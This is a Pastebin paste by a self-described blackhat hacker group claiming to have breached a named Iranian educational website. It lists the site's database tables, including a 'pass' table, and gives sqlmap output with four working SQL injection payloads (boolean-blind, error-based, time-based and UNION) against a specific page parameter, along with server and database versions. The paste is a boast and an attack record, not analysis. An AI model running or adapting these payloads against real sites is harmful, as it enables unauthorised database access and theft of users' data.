Advertisement
Islam-Hacker

Hit by JM511->m-zolfaghari.ir Database info

Feb 26th, 2017
1,861
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.95 KB | None | 0 0
  1. ########### T4TEAM BLACKHAT ##############
  2. HACKED BY JM511 Hacker
  3. Twitter : @T4TBHH
  4. ######### Saudi Arabian Hackers ###########
  5. Site: www.m-zolfaghari.ir AND www.ta-mz.ir
  6. Title: Majid Zolfaghari - Educational Website
  7.  
  8.  
  9.  
  10. Database: cp20217_mz
  11. [10 tables]
  12. +------------+
  13. | contact |
  14. | excercises |
  15. | fun |
  16. | image |
  17. | inbox |
  18. | jozve |
  19. | news |
  20. | pass |
  21. | sample |
  22. | upload |
  23. +------------+
  24.  
  25. Parameter: #1* (URI)
  26. Type: boolean-based blind
  27. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  28. Payload: http://www.m-zolfaghari.ir:80/more-news.php?id=18 RLIKE (SELECT (CASE WHEN (5508=5508) THEN 18 ELSE 0x28 END))
  29. Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
  30.  
  31. Type: error-based
  32. Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  33. Payload: http://www.m-zolfaghari.ir:80/more-news.php?id=18 AND EXTRACTVALUE(2414,CONCAT(0x5c,0x71716b7171,(SELECT (ELT(2414=2414,1))),0x716b787a71))
  34. Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
  35.  
  36. Type: AND/OR time-based blind
  37. Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  38. Payload: http://www.m-zolfaghari.ir:80/more-news.php?id=18 AND (SELECT * FROM (SELECT(SLEEP(5)))vAPc)
  39. Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
  40.  
  41. Type: UNION query
  42. Title: Generic UNION query (NULL) - 3 columns
  43. Payload: http://www.m-zolfaghari.ir:80/more-news.php?id=18 UNION ALL SELECT NULL,NULL,CONCAT(0x71716b7171,0x57594c5945615442664a696e445a685a66596841796159475248746e595a684858504b6372554e46,0x716b787a71)-- innD
  44. Vector: UNION ALL SELECT NULL,NULL,[QUERY][GENERIC_SQL_COMMENT]
  45. ---
  46. [20:12:22] [INFO] the back-end DBMS is MySQL
  47. web application technology: PHP 5.4.45, Apache
  48. back-end DBMS: MySQL >= 5.1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement